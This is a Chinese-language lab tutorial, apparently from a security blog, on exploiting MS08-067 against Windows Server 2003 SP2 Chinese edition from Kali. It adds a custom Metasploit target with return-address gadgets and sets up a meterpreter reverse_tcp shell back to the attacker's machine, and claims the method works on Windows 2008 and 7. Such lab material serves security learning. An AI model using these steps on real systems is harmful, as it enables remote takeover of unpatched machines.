kail入侵win2003 sp2 中文版系统

 2022-02-13    210  

教程开始:

攻击机:kail —— IP:192.168.74.132

目标靶机:win2003 sp2 中文版系统—— IP:192.168.74.128

 

一、扫描漏洞

1. 在kail中运行 namp 192.168.74.128 ,查看目标主机开放的端口号并选取要攻击的端口号

 2. 由于是中文版系统所以需要添加模块

(1)进入目录: cd  /usr/share/metasploit-framework/modules/exploits/windows/smb

(2)备份文件: cp  ms08_067_netapi.rb ms08_067_netapi_ser2003_zh.rb

(3)列出文件: ls

 

 (4)编辑文件: vim  ms08_067_netapi_ser2003_zh.rb

 (5)添加以下内容:

['Windows 2003 SP2 Chinese (NX)',

           {

             'RetDec'    => 0x7c99beb8,  # dec ESI, ret @NTDLL.DLL (0x4EC3)

             'RetPop'    => 0x7cb5e84e,  # push ESI, pop EBP, ret @SHELL32.DLL(0x565DC3)

             'JmpESP'    => 0x7c99a01b,  # jmp ESP @NTDLL.DLL(0xFFE4)

             'DisableNX' => 0x7c96f517,  # NX disable @NTDLL.DLL

             'Scratch'   => 0x00020408,

           }

          ],

 3. 进入攻击阶段

(1)进入msfconsole模式

 (2)查找漏洞: search ms08_067   (或者使用show exploits 列出所有漏洞)

 (3)使用漏洞: use exploit/windows/smb/ms08_067_netapi_ser2003_zh

 (4)查看详情: info   (记住下图所圈的id号,后边会用到,具体的id号是多少根据自己的实际情况而定)

 (5)设置监听主机: set LHOST 192.168.74.132   (kail的IP)

 (6)设置目标主机: set RHOST 192.168.74.128   (靶机的IP)

 (7)设置攻击方式: set payload windows/meterpreter/reverse_tcp

 (8)查看详情: show options

 (9)设置目标id: set  target  12

 (10)查看详情:  show  options

 

 (11)攻击: exploit

 

同理,08、win7也可以用此类方法,此方法仅用于学习,切勿用于违法行为!!


  •  标签:  

原文链接:https://www.ceacer.cn/?id=342

=========================================

https://www.ceacer.cn/ 为 “Ceacer 网安” 唯一官方服务平台,请勿相信其他任何渠道。